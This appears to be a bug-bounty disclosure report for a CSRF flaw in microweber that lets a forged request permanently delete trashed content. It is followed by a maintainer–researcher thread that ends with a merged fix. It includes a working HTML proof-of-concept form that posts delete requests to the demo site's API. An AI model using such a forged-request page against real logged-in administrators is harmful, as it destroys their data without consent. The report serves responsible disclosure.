Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Aug 9th 2021


✍️ Description

An attacker can permanently delete every file in the trash by means of a CSRF attack, provided they know the id parameter values of the files that exist in the trash.

🕵️‍♂️ Proof of Concept

After running PoC.html in Firefox or Safari and clicking the submit button (the form can also be auto-submitted), you will see that the files with ids 18, 19 and 20 have been deleted.

//PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
<input type="hidden" name="ids&#91;&#93;" value="18" />
<input type="hidden" name="ids&#91;&#93;" value="19" />
<input type="hidden" name="ids&#91;&#93;" value="20" />
<input type="hidden" name="forever" value="true" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

All files in the trash will be deleted forever.

📍 Location

app.js#L1

Occurrences

We have contacted a member of the microweber team and are waiting to hear back 4 months ago
microweber/microweber maintainer has invalidated this vulnerability 4 months ago

This issue needs the user to be logged in as admin.

The disclosure bounty has been dropped
The fix bounty has been dropped
amammad
4 months ago

Researcher


Yeah, the main point of any CSRF attack is that the user must be logged in first; excuse me for my bad explanation, but this is CSRF and a CWE has already been assigned to it.

amammad
4 months ago

Researcher


CSRF attacks mean that first the user/admin has to be logged into your application, and then they just visit a malicious website; after that, only by visiting that site, the attacker can delete a batch of users.

amammad
4 months ago

Researcher


You can set the Strict value on the SameSite attribute of just one of your cookies, and then nobody will be able to perform any CSRF attacks.

amammad
4 months ago

Researcher


@admin, can you change the status of this report as before?

Jamie Slome
4 months ago

Admin


@amammad - I have updated the status of the report.

@maintainer - feel free to mark as valid if you see fit.

Peter Ivanov validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov
4 months ago

Maintainer


Thanks, we will fix it and provide an update soon.

amammad
4 months ago

Researcher


Yeah, you're welcome, dear Peter. Can you validate the other CSRFs too?

amammad modified their report
4 months ago
amammad
4 months ago

Researcher


@admin Hey man, I made a foolish mistake and reported a vulnerability with the wrong title.

Can you change the title to CSRF? With regards.

Jamie Slome
4 months ago

Admin


@amammad - sorted!

Peter Ivanov confirmed that a fix has been merged on 8a577f 4 months ago
Peter Ivanov has been awarded the fix bounty